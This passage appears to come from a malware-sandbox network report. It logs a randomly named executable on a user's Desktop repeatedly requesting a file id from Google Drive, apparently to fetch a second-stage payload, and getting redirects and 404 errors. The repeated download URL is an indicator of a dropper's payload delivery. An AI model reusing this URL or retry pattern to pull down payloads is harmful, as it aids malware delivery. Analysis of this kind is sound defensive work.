                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    51 | 192.168.2.7 | 52236 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:02 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:03 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQqfCi4eVRg4oQApnPAvqVklbAgG2t8gSvdf3zcYeoTw_X6y9-27f3x9sn3_2JzfUjyXeaX2zU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:02 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-wKWt0sHf383pA4KBnIxx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:03 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iJDFelEV8zt6H5KP2uPVQg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    52 | 192.168.2.7 | 52237 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:03 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:04 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-pgMwlHZSM7dAzw-vG5rKiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    53 | 192.168.2.7 | 52238 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:04 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:05 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQXAhPWR9XxZT7Zf1avqSYLdKrJi9eWhWatEqjOHtg3NYPwz9SiLzN5HZ_Ofitno5DV
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:05 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-KyS7PoPuWwSleTI2YPIWJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:05 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7v8qUkmN36yQaaymZXTYOA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    54 | 192.168.2.7 | 52239 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:06 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:06 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-1F1ufacRn7FDYNwbl-buEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    55 | 192.168.2.7 | 52240 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:07 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRLN2hHNgHadDyjbHkDIejP_rc_PEBZvlpo8Zr1Nrw_4nLmhUHWWUUepfsPn57wBl9Y
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:07 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-0XQU5w46C9o9sFj8tcf-MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:07 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HmHuECgyz63tFSKS9HoUXg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    56 | 192.168.2.7 | 52241 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:08 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:08 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:08 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-5QIylEcl3opirMTmiobMVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    57 | 192.168.2.7 | 52242 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:09 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:09 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6YCsH2EuQyep-wImEfpcXIyghGGUnCucgEwKk7kWInKiiyHEFO2m46bAoHZkx6KMyk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:09 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-CYk39Zhs9tEnp8pXEabm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:09 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RekRtPuWsbofmYrBZF3r6A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    58 | 192.168.2.7 | 52243 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:10 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:10 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-92WQZrogbPIsjYWpEXgkiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    59 | 192.168.2.7 | 52244 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:11 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:12 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQxFF9m1p7SgXmQmgCIoH_o0QEzvSqXbOgMJ0f3kvD8UXazqjuZwqoIWakRsu0aD0lA
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:12 GMT
                                                    Content-Security-Policy: script-src 'nonce--jXm5Q9HdG232UYPwLzM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
